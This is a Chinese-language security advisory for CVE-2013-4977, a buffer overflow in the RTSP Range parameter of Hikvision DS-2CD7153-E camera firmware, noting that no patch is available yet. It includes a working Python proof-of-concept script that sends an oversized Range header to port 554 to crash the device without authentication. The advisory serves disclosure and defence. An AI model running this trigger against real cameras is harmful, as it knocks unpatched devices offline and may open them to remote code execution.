发布日期：2013-08-06
更新日期：2013-08-08

受影响系统：

hikvision DS-2CD7153-E IP Camera v4.1.0 b130111

描述：

---

BUGTRAQ  ID: 61642
CVE(CAN) ID: CVE-2013-4977

Hikvision DS-2CD7153-E是日夜型防水防暴迷你半球网络摄像机。

Hikvision DS-2CD7153-E固件版本4.1.0 b130111在处理RTSP事务的Range参数时，精心构造的报文会触发缓冲区溢出，造成处理通讯的进程崩溃，Watchdog服务重启。无需身份验证即可利用此漏洞，也有可能导致远程代码执行。

<*来源：Anibal Sacco
  
  链接：http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=advisory&name=CORE-2013-0708
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

import socket

HOST = 'X.X.X.X'
PORT = 554            
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

trigger_pkt =  "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST
trigger_pkt += "CSeq: 7\r\n"
trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n"

s.sendall(trigger_pkt)
print "Packet sent"
data = s.recv(1024)
print 'Received', repr(data), "\r\n"
s.close()

建议：

---

厂商补丁：

hikvision
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.hikvision.com/en/products_show.asp?id=506

浏览次数：4697
严重程度：0（网友投票）